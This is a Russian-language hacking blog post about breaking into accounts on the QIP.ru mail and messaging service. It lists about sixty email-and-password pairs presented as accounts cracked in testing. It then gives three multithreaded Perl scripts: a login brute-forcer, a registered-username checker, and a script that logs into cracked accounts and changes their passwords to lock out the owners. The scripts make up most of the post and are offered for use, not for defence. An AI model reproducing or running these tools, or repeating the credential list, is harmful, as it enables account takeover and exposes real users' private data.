На днях, я увидел брут для аккаунтов QIP, брутфорс написан под Windows, его автор _Alien_.
d1486651d15f Cкрипты для взлома аккаунтов QIP

Этот брут поддержевает:
d2a1f3c391fb Cкрипты для взлома аккаунтов QIPМногопоточность
d2a1f3c391fb Cкрипты для взлома аккаунтов QIPПоддержка HTTP,
d2a1f3c391fb Cкрипты для взлома аккаунтов QIPSocks4, Socks5 прокси
d2a1f3c391fb Cкрипты для взлома аккаунтов QIPПоддержка работы без прокси(максимум 1-2 потока)
d2a1f3c391fb Cкрипты для взлома аккаунтов QIPВозможность брута всех поддоменов qip`a

В соурсе должен быть список вида Login;pass
Со слов автора:
Во время теста сбрутил около 300 мыл.

Скачать.

Аккаунты сбрученные при тесте:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
dima.s@qip.ru;h7lW6O
Dimaa@qip.ru;q9kSjn
Dev1L@qip.ru;xOz4NSz
dimon123456@qip.ru;biO7Ko
dizel777@qip.ru;piSowf
djbugz@qip.ru;9w0ssO
djcement@qip.ru;didxKO
djdfy@qip.ru;t8uocJ
Djoker@qip.ru;Ocdbw3
DmitRICH777@qip.ru;rPE2xT
doc_x@qip.ru;aqP2cNS
doc27@qip.ru;pOYp3m
DontStopTheMusic@qip.ru;thSBYq
don.t@qip.ru;7urtth
doom84@qip.ru;4Ymcpm
dozerhome@qip.ru;8cORRx
draks@qip.ru;REvf9s
DragonShard@qip.ru;doj208
drgr@qip.ru;nCY56p
DREZD@qip.ru;bKNSuT7
drmad@qip.ru;OCquKl
droff@qip.ru;9Ojp3v
dservice@qip.ru;JRnSz3
dryuxa@qip.ru;haWS7c
dubina@qip.ru;vqaOK4
dubillist@qip.ru;bifi39
duet@qip.ru;z2CoBx
Duko@qip.ru;7ss6pO
duru@qip.ru;bpt6OO
dysha@qip.ru;fEk9uY
eeeeee@qip.ru;aeNSwOC
eldar81@qip.ru;ioxd7d
elcin@qip.ru;E72z31
Elfik@qip.ru;eWpbbh
elnara@qip.ru;1Onhw0
emae@qip.ru;loKt8n
emilka@qip.ru;S5O6v9
EnJay@qip.ru;6Yi32p
eqwerty@qip.ru;lsfKB0
eny@qip.ru;WYh1kp
007@pochta.ru;1d2vip
123455@pochta.ru;e0mmas
dev-il@qip.ru;YJRnCo
dezibl@qip.ru;dh2Rwi
dima911@qip.ru;OOW2Br
dezail@qip.ru;ac9Esm
Dizzz@qip.ru;8oWkmJ
DevilAngel@qip.ru;c2ndcNS
EAscreamo@qip.ru;BgsnNSh
efimov@qip.ru;smwdTp
Didad@qip.ru;2nWNS7J
dixis@qip.ru;9wWpKK
Eritik@qip.ru;vzT59R
erty@qip.ru;ss5pJs
duh@qip.ru;o3OKWx
evgeny78@qip.ru;jEczpT
dfa@qip.ru;kfO6tl
1233@pochta.ru;clY9ni
elnur123@qip.ru;B6sJRs
den-x@qip.ru;rOzYTx

Посмотрел я на брут, и подумал, а если акки будут угонять ?
И я решил написать скрипт для смены паролей.
Собственно говоря вот и он:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
#!/usr/bin/perl -w

use warnings;
use LWP::UserAgent;
use threads;
use threads::shared;
use Fcntl ':flock';
print q(##################################################
#      QIP.ru Password Changer and acc checker   #
#        Jabber:avchecking@cryptovpn.com         #
#              http://nig.org.ua/                #
##################################################
 
);
my $afile    = 'source.txt'     ; #Акки
my $threads  =  shift || 10     ; #Кол-во потоков
my $gname    = 'good.txt'       ; #Валидные
my $bname    = 'bad.txt'        ; #Беды
my $ename    = 'error.txt'      ; #Ошибки
my $delim    = ';'          ; #Разделитель
 
 
my $i : shared;
$| =1;
 
my @alist : shared = load($afile);
 
$size = scalar @alist;
 
threads->new(\&Brut) for 1 .. $threads;
$_->join for threads->list;
 
sub Brut
{
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/4.0");
$ua->cookie_jar({});
    while(@alist)
    {  
        my ($mail, $pass) = split /$delim/, shift @alist;
        my ($login, $host) = split /\@/, $mail;
 
        my $answ = $ua->post('http://qip.ru/login',
                {
                login => $login,
                host => $host,
                password => $pass,
                })->code;
 
        if($answ == 302) {
           
            my @array = (
                'a', 'b',  'c', 'd', 'e', 'f', 'g', 'h', 'i', 'l', 'm', 'n',
                'o', 'p',  'q', 'r', 's', 't', 'u', 'i', 'O', 'Y', 'T', 'Y',
                'O', 'O',  'P', 'p', 'B', 'C', 'R', 'O', 'S', 'E', 'K', 'J',
                'W', 'NS', 'j', 'k', 'v', 'w', 'x', 'z', '1', '2', '3', '4',
                '5', '6',  '7', '8', '9', '0'
            );
           
            my $pass_new =
                $array[ rand(@array) ]
              . $array[ rand(@array) ]
              . $array[ rand(@array) ]
              . $array[ rand(@array) ]
              . $array[ rand(@array) ]
              . $array[ rand(@array) ];
           
            @array = ();
           
            $answ = $ua->post('http://qip.ru/settings',
                {
                oldpass => $pass,
                newpass1 => $pass_new,
                newpass2 => $pass_new,
                quest_switch => 0,
                quest => 0,
                sex => 'Male',
                'bday_m' => 0,
                cnt_msg => 0,
                cnt_email => 0,
                cnt_phone => 0,
                cnt_adr => 0,
                save_profile => 1,
                })->code;
           
            if($answ == 302) {
                print " [+] ".$login.'@'.$host.$delim.$pass_new."\n";
                open(FILE, ">>$gname") || die("Could not open $fname\n");
                flock(FILE, LOCK_EX);
                print FILE $login.'@'.$host.$delim.$pass_new."\n";
                flock(FILE, LOCK_UN);
                close(FILE);
            } else {
                print " [-] [ CHANCH PASS ERROR ] ".$login.'@'.$host.$delim.$pass.' => '.$pass_new."\n";
                open(FILE, ">>$ename") || die("Could not open $fname\n");
                flock(FILE, LOCK_EX);
                print FILE $login.'@'.$host.$delim.$pass."\n";
                flock(FILE, LOCK_UN);
                close(FILE);
            }
        } else {
            print " [-] [ LOGIN ERROR ] ".$login.'@'.$host.$delim.$pass."\n";
            open(FILE, ">>$bname") || die("Could not open $fname\n");
            flock(FILE, LOCK_EX);
            print FILE $login.'@'.$host.$delim.$pass."\n";
            flock(FILE, LOCK_UN);
            close(FILE);
        }
        $ua->cookie_jar->clear;
        {lock($i);$i++;}
        print "Process: ".sprintf("%.2f", ($i/$size)*100)."% \r";
    }
}
 
sub load
{
 open(F, ", $_[0]) || die $_[0].' - '.$!.$/;
 chomp(my @list = );
 close F;
 
 return @list;
}

После чего я решил написать ещё один скрипт, для проверки логинов на зареганость.
Собственно говоря вот и скрипт:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#!/usr/bin/perl -w

###
use strict;
use warnings;
use LWP::UserAgent;
use threads;
use threads::shared;
use Fcntl ':flock';
###

my $afile    = 'nics.txt'       ; # Ники
my $threads  =  shift || 3      ; # Кол-во потоков
my $ename    = 'exist.txt'      ; # Существующие
my $nname    = 'notexist.txt'   ; # Не существующие
my $wname    = 'wrong.txt'      ; # Окончившиеся с ошибкой
my $host     = 'qip.ru'         ; # Домен
 
my $i : shared;
$| =1;
 
my @alist : shared = load($afile);
 
my $size = scalar @alist;
 
threads->new(\&Brut) for 1 .. $threads;
$_->join for threads->list;
 
sub Brut {
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/4.0");
 
    while(@alist)
    {  
        my $login = shift @alist;
 
        my $answ = $ua->post('http://qip.ru/reg/checkRegLogin?&JsHttpRequest=13214761520551-xml',
                {
                username => $login,
                host => $host,
                })->content;
 
        if($answ =~ m#"js":{"code":"400"#)
            {
                print " [+] $login\n";
                open(FILE, '>> '.$ename) || die("Could not open $ename\n");
                flock(FILE, LOCK_EX);
                print FILE $login."\n";
                flock(FILE, LOCK_UN);
                close(FILE);
            } elsif ($answ =~ m#"js":{"code":"200"#) {
                print " [-] $login\n";
                open(FILE, '>> '.$nname) || die("Could not open $nname\n");
                flock(FILE, LOCK_EX);
                print FILE $login."\n";
                flock(FILE, LOCK_UN);
                close(FILE);
            } else {
                print " [W] $login [ $answ ]\n";
                open(FILE, '>> '.$wname) || die("Could not open $wname\n");
                flock(FILE, LOCK_EX);
                print FILE $login." [ ".$answ." ]\n";
                flock(FILE, LOCK_UN);
                close(FILE);
            }
        {lock($i);$i++;}
        print "Process: ".sprintf("%.2f", ($i/$size)*100)."%              \r";
    }
}
 
sub load
{
 open(F, ", $_[0]) || die $_[0].' - '.$!.$/;
 chomp(my @list = );
 close F;
 
 return @list;
}

Вот ещё ради коллекции решил выложить брут того же квипа только на Perl.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
#!/usr/bin/perl -w
use warnings;
use LWP::UserAgent;
use threads;
use threads::shared;
use Fcntl ':flock';
print q(##################################################
#      QIP.RU BruteForce by .ucra v1.0 Public    #
#                   ICQ:7733029                  #
#                 http://nifon.ru                #
##################################################
 
);
my $afile    = 'source.txt'     ; #Акки
my $threads  =  shift || 20     ; #Кол-во потоков
my $fname    = 'good.txt'       ; #Валидные
my $delim    = ':'          ; #Разделитель
my $host     = 'qip.ru'         ; #Домен
 
 
my $i : shared;
$| =1;
 
my @alist : shared = load($afile);
 
$size = scalar @alist;
 
for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }
 
sub Brut
{
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/4.0");
 
    while(@alist)
    {  
        my ($login, $pass) = split /$delim/, shift @alist;
 
        my $answ = $ua->post('http://qip.ru/login',
                {
                login => $login,
                host => $host,
                password => $pass,
                })->code;
 
        if($answ == 302)
            {
                print " [+] $login:$pass\n";
                open(FILE, ">>$fname") || die("Could not open $fname\n");
                flock(FILE, LOCK_EX);
                print FILE "$login:$pass\n";
                flock(FILE, LOCK_UN);
                close(FILE);
            }
        {lock($i);$i++;}
        print "Process: ".sprintf("%.2f", ($i/$size)*100)."% \r";
    }
}
 
sub load
{
 open(F, ", $_[0]) || die $_[0].' - '.$!.$/;
 chomp(my @list = );
 close F;
 
 return @list;
}

tt twitter big4 Cкрипты для взлома аккаунтов QIP tt digg big4 Cкрипты для взлома аккаунтов QIP tt facebook big4 Cкрипты для взлома аккаунтов QIP tt gmail big4 Cкрипты для взлома аккаунтов QIP tt myspace big4 Cкрипты для взлома аккаунтов QIP tt reddit big4 Cкрипты для взлома аккаунтов QIP

Оставить комментарий

CAPTCHA изображение
Обновить изображение
*

RSS-подписка NIG Twitter-подписка NIG

Метки
Друзья
Блог линуксоида Программы для диагностики компьютера
Супер Pixel
Убивалка флешаБэкконект шелл. Часть вторая.Бэкконект шелл. Начало.НАМ для деления чиселПростая арифметикаПередача файлов. Часть третья. Клиент.Dll injectionСканер портовКодировка текста в BMPРухнул на два дняПередача файлов. Часть вторая. Сервер.Поворот и BMPCRC32 суммаBMP форматфайловые вирусыассемблер, строкиАссемблер и матрицапримеры ассемблерМногопоточное программированиеАрхитектура клиент — серверРаздача ICQПишем шуткупишем паукаПривет от ДжеймсаОбход firewallЗагрузка картинок на Gyazo, прямо из ThunarКейлоггер 3Плюшки в контекстном меню Thunarc по сетиКейлоггер 2КейлоггерСкачать Ассемблер!VirusCheckerОтморозки мешают жить ?! Не проблемма !Cкрипты для взлома аккаунтов QIPWinAPI. Работа с файлами. Часть третья. ЧтениеDlink exploitБрут сайта etxt.ruКрасивая раскладка клавиатуры в GnomeМои безделушки на PerlКак запускать Perl скрипты под WindowsБрутфорс партнёрки ZipCoinПарсер upwap.ruИзменения в блогеЧудо ЗаливалкаСкрипт для загрузки файлов на Zalil.ruЯндекс «чоткий» поисковик!WinAPI. Работа с файлами. Часть вторая. ЗаписьWinAPI. Работа с файлами. Часть первая. ПоискПолучение MD5 хеша средствами C++Что нам стоить letitfile.com забрутить?WarCraft III запуск под LinuxЭнтропия файлаWinsock и C++. Мини прокси. Часть |\\/. Завершающая.Перепилил чекер для 4gameЧекер акаунтов YoupornCMailSend v 1.1. Отправка почы без проблемСлучайные числаWinsock и C++. Часть |||. smtp монстр.Брутфорс LetitFile.comИспользование X-Forwarded-For, для обмана веб-сервера, подмена IP подручными средствамиДело было вечером, делать было нечего…Мысли о аудио сервереПарсер ников из твиттераКонец школоло…Perl+Linux. Заметка первая (Удобный Paste bin).Бэкконект шелл.E-MAIL + winsocket + Cpp. Сложно?winsock и C++. Часть ||. Атака клоунов.C++ резолвинг адресаPerl, анализ HTML кода и определение CMSМатематика в C++winsock и C++